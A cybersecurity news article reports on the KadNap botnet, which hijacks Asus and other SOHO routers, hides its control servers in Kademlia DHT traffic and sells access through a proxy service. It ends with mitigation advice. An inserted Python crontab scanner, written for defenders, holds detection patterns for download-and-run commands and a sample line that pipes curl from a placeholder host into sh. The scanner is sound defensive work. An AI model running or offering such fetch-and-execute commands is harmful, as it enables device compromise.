KadNap Malware Compromises 14,000+ Routers Through Security Flaws

Cybersecurity researchers from Lumen’s Black Lotus Labs have uncovered a sophisticated new malware strain dubbed “KadNap.”

This emerging threat has already compromised more than 14,000 edge networking devices, with a primary focus on Asus routers.

By conscripting these vulnerable devices into a massive botnet, cybercriminals are creating a hidden proxy network designed to route malicious traffic and launch further cyberattacks while evading detection.

The discovery highlights a growing trend of threat actors targeting Small Office and Home Office (SOHO) routers to fuel large-scale criminal operations.

How KadNap Evades Detection

What makes KadNap particularly dangerous is its innovative approach to concealing its command-and-control (C2) infrastructure.

The malware utilizes a custom version of the Kademlia Distributed Hash Table (DHT) protocol. In legitimate applications, DHT is used by peer-to-peer networks such as BitTorrent to efficiently locate data held across many users without relying on a central server.

KadNap weaponizes this concept to hide its control servers within the background noise of standard peer-to-peer traffic. This makes it incredibly difficult for network defenders to track or block the servers managing the botnet.

aic.sh script initializing a cron job to run every hour (Source: lumen)

The infection process begins when a targeted device downloads a malicious shell script named “aic.sh.” This script establishes persistence on the router by setting up a scheduled task, known as a cron job, that runs every hour.

Once persistence is secured, the script downloads the primary malicious executable, a file named “kad.”
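A defender-side check for the persistence pattern just described: a scanner that flags crontab entries which run hourly and invoke aic.sh or kad, or which fetch and execute remote content. This is an added example, not code from Lumen's report; it assumes you can read the router's crontab as text, and the crontab lines it scans are constructed samples, not real indicators.

```python
"""Flag crontab entries that resemble KadNap's persistence: an hourly job
running aic.sh or the 'kad' binary, or a fetch-and-execute one-liner.
Added example; the only names taken from the article are aic.sh and kad."""
import re
from dataclasses import dataclass

# Tokens named in the article; the surrounding patterns are assumptions.
KNOWN_ARTIFACTS = re.compile(r"(?:^|[/\s])(?:aic\.sh|kad)(?:\s|$)")
# Generic "download then run" shape: wget/curl/tftp piped into sh, or chained with sh/chmod.
FETCH_AND_RUN = re.compile(r"\b(?:wget|curl|tftp)\b.*(?:\|\s*sh|&&\s*(?:sh|chmod))")

@dataclass
class Finding:
    line: str
    reasons: list

def is_hourly(schedule: str) -> bool:
    """True when the five cron fields fire once per hour (fixed minute, every hour/day)."""
    fields = schedule.split()
    if len(fields) != 5:
        return False
    minute, hour, dom, month, dow = fields
    return minute.isdigit() and hour in ("*", "*/1") and dom == month == dow == "*"

def parse_crontab(text: str):
    """Yield (schedule, command) pairs, skipping comments and blank lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)  # five schedule fields, then the command
        if len(parts) < 6:
            continue
        yield " ".join(parts[:5]), parts[5]

def scan_crontab(text: str) -> list:
    """Return one Finding per suspicious entry, with the reasons it was flagged."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if KNOWN_ARTIFACTS.search(command):
            reasons.append("references aic.sh/kad")
        if FETCH_AND_RUN.search(command):
            reasons.append("downloads and executes remote content")
        if reasons and is_hourly(schedule):
            reasons.append("runs hourly")
        if reasons:
            findings.append(Finding(f"{schedule} {command}", reasons))
    return findings

# Constructed sample crontab (placeholder host, not a real indicator).
SAMPLE = """\
# m h dom mon dow command
0 * * * * /tmp/aic.sh
30 3 * * 0 /sbin/logrotate.sh
*/5 * * * * curl -s http://EXAMPLE-PLACEHOLDER/x | sh
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE):
        print(f.line, "->", "; ".join(f.reasons))
```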

Once a device is fully assimilated into the KadNap botnet, its internet connection is packaged and sold through a criminal proxy service known as “Doppelganger.”

The aic.sh shell script downloads a malicious ELF file and renames it to kad (Source: lumen)

Security analysts believe Doppelganger is a rebranded version of Faceless, a notorious proxy service previously associated with the defunct “TheMoon” malware campaign.

Cybercriminals purchase access to these hijacked routers to mask their true locations while conducting illicit activities.

Global Impact and Defensive Measures

The sheer scale of the KadNap botnet presents a significant risk to the global internet ecosystem. Telemetry data indicates that the botnet maintains an average of 14,000 active victims per day.

The infection is geographically concentrated, with approximately 60% of the compromised routers located in the United States. Other heavily affected regions include Taiwan, Hong Kong, and Russia.

Because the malicious traffic originates from ordinary home internet connections, it easily bypasses traditional geofencing and basic network blocks.

KadNap malware initializations (Source: lumen)

To protect against the KadNap malware and prevent devices from being conscripted into this malicious proxy network, security experts recommend several critical mitigation strategies:

  • Keep firmware updated: Regularly check for and install the latest security patches provided by the router manufacturer to close known vulnerabilities.
  • Reboot devices frequently: Periodic reboots can disrupt temporary malware infections that reside only in the device’s memory.
  • Secure management interfaces: Ensure that the router’s administrative login page is not exposed to the public internet. Disable remote management features when not actively required.


The post KadNap Malware Compromises 14,000+ Routers Through Security Flaws appeared first on Cyber Security News.
